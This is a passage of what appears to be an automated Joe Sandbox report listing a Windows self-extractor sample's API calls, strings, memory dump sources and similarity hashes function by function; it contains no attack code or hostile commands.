                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                        • String ID: riched20.dll$3Ro
                                                                                                                                        • API String ID: 3498096277-3613677438
                                                                                                                                        • Opcode ID: 9863693e927bd2f3ac9b65863de25529bc28058be9427cefc8448b61364f6c5c
                                                                                                                                        • Instruction ID: 5e0cf1fdfc4ad2f2f43cb48aed2723ec9470e8f2253973a3d602744455f7e54b
                                                                                                                                        • Opcode Fuzzy Hash: 9863693e927bd2f3ac9b65863de25529bc28058be9427cefc8448b61364f6c5c
                                                                                                                                        • Instruction Fuzzy Hash: 38F0FFB5D0010DBBCB10AF9AD8499EEFFFCEF95705F00816AE814E2211D7B85645CBA1

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079FDC9: ResetEvent.KERNEL32(?,?,0079F9F3,014F6D78,?,007D1E74,00000000,007BF79B,000000FF,000001B8,0079FC8F,?,?,?,?,0079A5A0), ref: 0079FDE9
                                                                                                                                          • Part of subcall function 0079FDC9: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,?,0079A5A0,?,?,?,?,007BF79B,000000FF), ref: 0079FDFD
                                                                                                                                        • ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0079FA05
                                                                                                                                        • CloseHandle.KERNEL32(?,?), ref: 0079FA1F
                                                                                                                                        • DeleteCriticalSection.KERNEL32(?), ref: 0079FA38
                                                                                                                                        • CloseHandle.KERNELBASE(?), ref: 0079FA44
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0079FA50
                                                                                                                                          • Part of subcall function 0079FAC7: WaitForSingleObject.KERNEL32(?,000000FF,0079FD0B,?,?,0079FD80,?,?,?,?,?,0079FD6A), ref: 0079FACD
                                                                                                                                          • Part of subcall function 0079FAC7: GetLastError.KERNEL32(?,?,0079FD80,?,?,?,?,?,0079FD6A), ref: 0079FAD9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1868215902-0
                                                                                                                                        • Opcode ID: 1c0f5fe3a39b6dcbbb56ebbea7d696e5d0f89bfeb9eef9803b33daab73a9d8fd
                                                                                                                                        • Instruction ID: bb01c4ee588bc4c5cd9113527456d4f50dd1defbd43f870c2046fa43eb88c3df
                                                                                                                                        • Opcode Fuzzy Hash: 1c0f5fe3a39b6dcbbb56ebbea7d696e5d0f89bfeb9eef9803b33daab73a9d8fd
                                                                                                                                        • Instruction Fuzzy Hash: 7A01B531100744EFCB319F28ED48F86BBEAFB46710F01852DF25E92560DB796840CBA1

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetClassNameW.USER32(?,?,00000050), ref: 007A8FDF
                                                                                                                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 007A9016
                                                                                                                                          • Part of subcall function 007A0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0079AC49,?,?,?,0079ABF8,?,-00000002,?,00000000,?), ref: 007A0B28
                                                                                                                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 007A9006
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                        • String ID: EDIT
                                                                                                                                        • API String ID: 4243998846-3080729518

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 905 7abe0a-7abe35 call 7acec0 SetEnvironmentVariableW call 79ef07 909 7abe3a-7abe3e 905->909 910 7abe62-7abe66 909->910 911 7abe40-7abe44 909->911 912 7abe4d-7abe54 call 79effe 911->912 915 7abe46-7abe4c 912->915 916 7abe56-7abe5c SetEnvironmentVariableW 912->916 915->912 916->910
                                                                                                                                        APIs
                                                                                                                                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007ABE20
                                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007ABE5C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                                        • String ID: sfxcmd$sfxpar
                                                                                                                                        • API String ID: 1431749950-3493335439

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 917 79973d-79975e call 7acec0 920 799760-799765 917->920 921 799767 917->921 920->921 922 799769-799786 920->922 921->922 923 799788 922->923 924 79978e-799798 922->924 923->924 925 79979a 924->925 926 79979d-7997c8 CreateFileW 924->926 925->926 927 7997ca-7997ec GetLastError call 79b275 926->927 928 79982c-799841 926->928 934 79981b-799820 927->934 935 7997ee-799810 CreateFileW GetLastError 927->935 929 79985b-799866 928->929 930 799843-799856 call 79f10e 928->930 930->929 934->928 936 799822 934->936 937 799812 935->937 938 799816-799819 935->938 936->928 937->938 938->928 938->934
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000,?,00000000,?,?,0079777A,?,00000005,?,00000011), ref: 007997BD
                                                                                                                                        • GetLastError.KERNEL32(?,?,0079777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007997CA
                                                                                                                                        • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,0079777A,?,00000005,?), ref: 007997FF
                                                                                                                                        • GetLastError.KERNEL32(?,?,0079777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00799807
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateErrorFileLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1214770103-0
                                                                                                                                        APIs
                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00799623
                                                                                                                                        • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 0079963B
                                                                                                                                        • GetLastError.KERNEL32 ref: 0079966D
                                                                                                                                        • GetLastError.KERNEL32 ref: 0079968C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2244327787-0
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007B2213,00000000,00000000,?,007B7778,007B2213,00000000,00000000,00000000,?,007B7975,00000006,FlsSetValue), ref: 007B7803
                                                                                                                                        • GetLastError.KERNEL32(?,007B7778,007B2213,00000000,00000000,00000000,?,007B7975,00000006,FlsSetValue,007C3768,007C3770,00000000,00000364,?,007B63F1), ref: 007B780F
                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007B7778,007B2213,00000000,00000000,00000000,?,007B7975,00000006,FlsSetValue,007C3768,007C3770,00000000), ref: 007B781D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                        APIs
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007A992F
                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007A9940
                                                                                                                                        • TranslateMessage.USER32(?), ref: 007A994A
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 007A9954
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$DispatchPeekTranslate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4217535847-0
                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 0079FBD5
                                                                                                                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 0079FC1C
                                                                                                                                          • Part of subcall function 00796DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00796DF1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                        • String ID: CreateThread failed
                                                                                                                                        • API String ID: 2655393344-3849766595
                                                                                                                                        APIs
                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,?,?,0079C853,00000001,?,?,?,00000000,007A420B,?,?,?,?,?,007A3CB0), ref: 00799BE3
                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,007A3EB8,00000000,?,?,00000000,007A420B,?,?,?,?,?,007A3CB0,?), ref: 00799C23
                                                                                                                                        • WriteFile.KERNELBASE(?,00000000,?,007A3EB8,00000000,?,00000001,?,?,0079C853,00000001,?,?,?,00000000,007A420B), ref: 00799C50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite$Handle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4209713984-0
                                                                                                                                        APIs
                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00799D92,?,00000001,00000000,?,?), ref: 00799EAD
                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00799D92,?,00000001,00000000,?,?), ref: 00799EE0
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00799D92,?,00000001,00000000,?,?), ref: 00799EFD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectory$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2485089472-0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID: CMT
                                                                                                                                        • API String ID: 3519838083-2756464174
                                                                                                                                        APIs
                                                                                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 007B82E8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Info
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1807457897-3916222277
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00791DA6
                                                                                                                                          • Part of subcall function 00793AA3: __EH_prolog.LIBCMT ref: 00793AA8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID: CMT
                                                                                                                                        • API String ID: 3519838083-2756464174
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID: CMT
                                                                                                                                        • API String ID: 3519838083-2756464174
                                                                                                                                        APIs
                                                                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,F5E85006,00000001,?,000000FF), ref: 007B7A7A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String
                                                                                                                                        • String ID: LCMapStringEx
                                                                                                                                        • API String ID: 2568140703-3893581201
                                                                                                                                        APIs
                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,007B709A), ref: 007B79F2
                                                                                                                                        Strings
                                                                                                                                        • InitializeCriticalSectionEx, xrefs: 007B79C2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                        • String ID: InitializeCriticalSectionEx
                                                                                                                                        • API String ID: 2593887523-3084827643
                                                                                                                                        • Opcode ID: 5ef5aaf7fc6d2bdcbe89b6b0abada8dbb45fce8e1e026be6f95f887e1e7866fe
                                                                                                                                        • Instruction ID: 0376f5aac17f9f1e2d73062527dc33f18dd36104a1f7d9d2aa890c2e0866b2a7
                                                                                                                                        • Opcode Fuzzy Hash: 5ef5aaf7fc6d2bdcbe89b6b0abada8dbb45fce8e1e026be6f95f887e1e7866fe
                                                                                                                                        • Instruction Fuzzy Hash: C1F0B47164520CFBCB156F60DC09EAEBF61EB44711B40812DFC156A160DE799E20D7C4
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Alloc
                                                                                                                                        • String ID: FlsAlloc
                                                                                                                                        • API String ID: 2773662609-671089009
                                                                                                                                        • Opcode ID: 222e0ca6cbe54dfbf5ad74747a842367d4780a22d71ec2e78ecb5cfef6d7da13
                                                                                                                                        • Instruction ID: 50896593e6e8af27c7a802dc2f7ab1bba02d470431be84bc02cbb7b80f39af3c
                                                                                                                                        • Opcode Fuzzy Hash: 222e0ca6cbe54dfbf5ad74747a842367d4780a22d71ec2e78ecb5cfef6d7da13
                                                                                                                                        • Instruction Fuzzy Hash: 77E0E5B4B45218BB8319AF649C4EFAEBBA4DB84B21F40816DFC0566251DD7D1E01C6C9
                                                                                                                                        APIs
                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 007B1DAF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: try_get_function
                                                                                                                                        • String ID: FlsAlloc
                                                                                                                                        • API String ID: 2742660187-671089009
                                                                                                                                        • Opcode ID: deef05db039d85cd05cf9f3d18b6bdc680a9030bf44b162c744a7fc64707e3fd
                                                                                                                                        • Instruction ID: 40e47e0b91b21caac976be7dab35dc9946ee44bf00f7f06f4f62acaefe7ff2b2
                                                                                                                                        • Opcode Fuzzy Hash: deef05db039d85cd05cf9f3d18b6bdc680a9030bf44b162c744a7fc64707e3fd
                                                                                                                                        • Instruction Fuzzy Hash: 55D02B21B82328BB851036C0AC02FDEBF448B01FB1FC4407DFF0821143859D08004AD1
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007ACD6E
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID: 3Ro
                                                                                                                                        • API String ID: 1269201914-1492261280
                                                                                                                                        • Opcode ID: 735fe520f10644c2283f1cbadf964c76c1e1a147d11ddf15c108fb572ff3d53a
                                                                                                                                        • Instruction ID: 8df1be5bfd926348358c5f72dab165430c062ec19fe856302febf3a4c61b9909
                                                                                                                                        • Opcode Fuzzy Hash: 735fe520f10644c2283f1cbadf964c76c1e1a147d11ddf15c108fb572ff3d53a
                                                                                                                                        • Instruction Fuzzy Hash: B8B012C5369005FD336592049E06D3F130CC0C2F55330C27FF402D4040A84C0C038033
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007B81EB: GetOEMCP.KERNEL32(00000000,?,?,007B8474,?), ref: 007B8216
                                                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,007B84B9,?,00000000), ref: 007B868C
                                                                                                                                        • GetCPInfo.KERNEL32(00000000,007B84B9,?,?,?,007B84B9,?,00000000), ref: 007B869F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 546120528-0
                                                                                                                                        • Opcode ID: 3e58eed8b6d2f5c0c5dbcd84058e796ac28869c6e126746773e8e2d8c9b68f2c
                                                                                                                                        • Instruction ID: 455bb57e32179424be600f8afa936c82c611dad9163f095e196e17627f315aa9
                                                                                                                                        • Opcode Fuzzy Hash: 3e58eed8b6d2f5c0c5dbcd84058e796ac28869c6e126746773e8e2d8c9b68f2c
                                                                                                                                        • Instruction Fuzzy Hash: 8A5149709002499FDB608FB5C895BFBBBEDEF41318F28416ED0968B152DE3D9941CB92
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00791383
                                                                                                                                          • Part of subcall function 00795FB1: __EH_prolog.LIBCMT ref: 00795FB6
                                                                                                                                          • Part of subcall function 0079C413: __EH_prolog.LIBCMT ref: 0079C418
                                                                                                                                          • Part of subcall function 0079C413: new.LIBCMT ref: 0079C45B
                                                                                                                                          • Part of subcall function 0079C413: new.LIBCMT ref: 0079C47F
                                                                                                                                        • new.LIBCMT ref: 007913FB
                                                                                                                                          • Part of subcall function 0079AC66: __EH_prolog.LIBCMT ref: 0079AC6B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
